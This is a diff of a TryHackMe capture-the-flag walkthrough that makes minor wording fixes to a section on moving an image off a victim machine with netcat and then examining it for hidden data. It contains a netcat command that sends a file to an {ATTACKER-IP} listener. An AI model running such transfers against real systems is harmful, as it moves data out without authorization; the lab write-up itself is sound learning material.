darthturgle1/TryHackMe_Walkthroughs/UA_High.md

 `nc -l -p 4444 > oneforall.jpg' (on my attacker machine)

-'nc -w 3 {ATTACKER-IP} 4444 < oneforall.jpg' (on the victim machine; remember to replace ATTACKER-IP with your individual attacker IP.
+'nc -w 3 {ATTACKER-IP} 4444 < oneforall.jpg' (on the victim machine; remember to replace ATTACKER-IP with your individual attacker IP.)

 **Note**: Like the PHP script earlier, you don't have to understand the workings of these commands.
 Even I had to use Nakkaya.com as a reference (https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/).
 Long story short, remember that **these commands are moving the image to our machine** for further analysis.

 ## Steganography (finding hidden data in an image)
-On my attacker machine, I double clicked **oneforall.jpg** to display my image.
+On my attacker machine, I double clicked **oneforall.jpg** to display the image.
 To my surprise, I received this message: **"Error interpreting JPEG image file (Not a JPEG file: starts with 0x89 0x50)."**

 From this message, I deduced that there was an issue with the file signature of **oneforall.jpg**.
-Using exiftool (`exiftool oneforall.jpg`) confirmed this, as it listed the file type as PNG, not JPEG.
+Using **exiftool** (`exiftool oneforall.jpg`) confirmed this, as it listed the file type as PNG, not JPEG.
 I used Wikipedia to view the file signatures for PNG and JPEG, then made the proper adjustments in hexedit on my local machine.

 Here are the steps to do so: